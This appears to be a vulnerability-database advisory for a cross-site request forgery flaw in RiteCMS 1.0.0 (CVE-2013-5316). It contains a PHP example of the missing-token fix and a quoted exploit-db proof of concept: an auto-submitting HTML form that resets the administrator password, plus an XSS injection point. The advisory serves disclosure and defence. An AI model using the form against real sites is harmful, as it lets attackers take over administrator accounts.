RiteCMS Cross-Site Request Forgery Vulnerability

Vulnerability ID 1121803 Type Cross-site request forgery
Published 2013-08-03 Updated 2013-08-22
CVE CVE-2013-5316 CNNVD-ID CNNVD-201308-043
Platform PHP CVSS score 6.8
|Source
https://www.exploit-db.com/exploits/27315
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-043
|Details
RiteCMS is a simple, lightweight content management system (CMS) developed by the RiteCMS project; it is designed to be easy to develop with, install and maintain. RiteCMS 1.0.0 contains a cross-site request forgery vulnerability: the cms/index.php script processes state-changing requests (such as editing a user account) without verifying that they originated from the application's own forms, i.e. there is no anti-CSRF token. A remote attacker who lures an authenticated administrator to a crafted page can make the victim's browser submit a request to cms/index.php, carrying the administrator's session cookie, that changes the administrator's password.
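How the missing check is closed, as an added example rather than RiteCMS's own code: a minimal PHP model of the user-edit handler in its vulnerable form, which trusts any request that arrives with the administrator's session, beside a hardened form that additionally requires a per-session synchronizer token. The function names, the `$session`/`$post` arrays standing in for `$_SESSION`/`$_POST`, the `csrf_token` field, the `admin_logged_in` flag and the user record layout are assumptions; the POST field names `id`, `name`, `new_pw`, `new_pw_r` and `edit_user_submitted` are the ones the exploit in this entry submits, and the sample request body is constructed from it.

```php
<?php
// Added example, not RiteCMS code. Field and function names are assumptions
// except for the POST parameters taken from the published exploit.
declare(strict_types=1);

/** Issue a per-session CSRF token (created once, then reused for the session). */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session copy. */
function csrf_valid(array $session, array $post): bool
{
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

/**
 * Vulnerable pattern: the only gate is "is the browser logged in?", which a
 * cross-site form satisfies because the browser attaches the session cookie.
 */
function edit_user_vulnerable(array $session, array $post, array &$users): bool
{
    if (empty($session['admin_logged_in']) || !isset($post['edit_user_submitted'])) {
        return false;
    }
    if ($post['new_pw'] !== $post['new_pw_r']) {
        return false;
    }
    $users[(int) $post['id']] = [
        'name'    => $post['name'],
        'pw_hash' => password_hash($post['new_pw'], PASSWORD_DEFAULT),
    ];
    return true;
}

/** Hardened: same handler, but the request must carry the session's token. */
function edit_user_hardened(array $session, array $post, array &$users): bool
{
    if (!csrf_valid($session, $post)) {
        return false; // a forged cross-site POST cannot know the token
    }
    return edit_user_vulnerable($session, $post, $users);
}

// Constructed demo data: a logged-in admin session, the user table, and the
// request body the attacker's auto-submitting form would send.
$session = ['admin_logged_in' => true];
$users   = [1 => ['name' => 'admin', 'pw_hash' => password_hash('original', PASSWORD_DEFAULT)]];
$forged  = [
    'mode' => 'users', 'id' => '1', 'name' => 'admin1',
    'new_pw' => 'admin', 'new_pw_r' => 'admin', 'type' => '1',
    'edit_user_submitted' => ' OK ',
];

$vuln = $users;
var_dump(edit_user_vulnerable($session, $forged, $vuln)); // forged request accepted

$hard = $users;
var_dump(edit_user_hardened($session, $forged, $hard));   // forged request rejected

// A form rendered by the CMS itself embeds the token, so it still works.
$legit = $forged + ['csrf_token' => csrf_token($session)];
var_dump(edit_user_hardened($session, $legit, $hard));
```

Run with `php example.php`: the vulnerable handler rewrites user 1 from the forged body, the hardened one refuses it, and the same body with the session token appended is accepted. In a real deployment the token is emitted as a hidden field on every state-changing form and checked before any write; a `SameSite` attribute on the session cookie and an Origin header check are useful defence in depth, not replacements for the token.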
|Exploit
###########################################################################################
# Exploit Title: RiteCMS multiple vulnerabilities
# Date: 2013 30 July
# Exploit Author: Yashar shahinzadeh
# Credit goes to: ha.cker.ir
# Vendor Homepage: http://ritecms.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 1.0.0
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################

Summary:
========
1. CSRF - Change administrator's password
2. Cross site scripting

1. CSRF - Adding an admin account:
==================================

<html>
<body onload="submitForm()">
  <!-- Auto-submitting form: the victim's browser attaches its RiteCMS session
       cookie, so cms/index.php processes the edit as the logged-in administrator. -->
  <form name="myForm" id="myForm"
        action="http://[Path to RiteCMS]/cms/index.php" method="post">
    <input type="hidden" name="mode" value="users">
    <input type="hidden" name="id" value="1">            <!-- user id 1: the administrator -->
    <input type="hidden" name="name" value="admin1">
    <input type="hidden" name="new_pw" value="admin">    <!-- new password -->
    <input type="hidden" name="new_pw_r" value="admin">  <!-- password confirmation -->
    <input type="hidden" name="type" value="1">
    <input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0">
  </form>
  <script type="text/javascript">
    function submitForm() { document.myForm.submit(); }
  </script>
</body>
</html>


2. Cross site scripting (After auth):
=====================================
http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]
|References

Source: XF
Name: ritecms-index-csrf(86193)
Link: http://xforce.iss.net/xforce/xfdb/86193

Source: BID
Name: 61587
Link: http://www.securityfocus.com/bid/61587

Source: EXPLOIT-DB
Name: 27315
Link: http://www.exploit-db.com/exploits/27315

Source: packetstormsecurity.com
Link: http://packetstormsecurity.com/files/122663/Rite-CMS-1.0.0-Cross-Site-Request-Forgery-Cross-Site-Scripting.html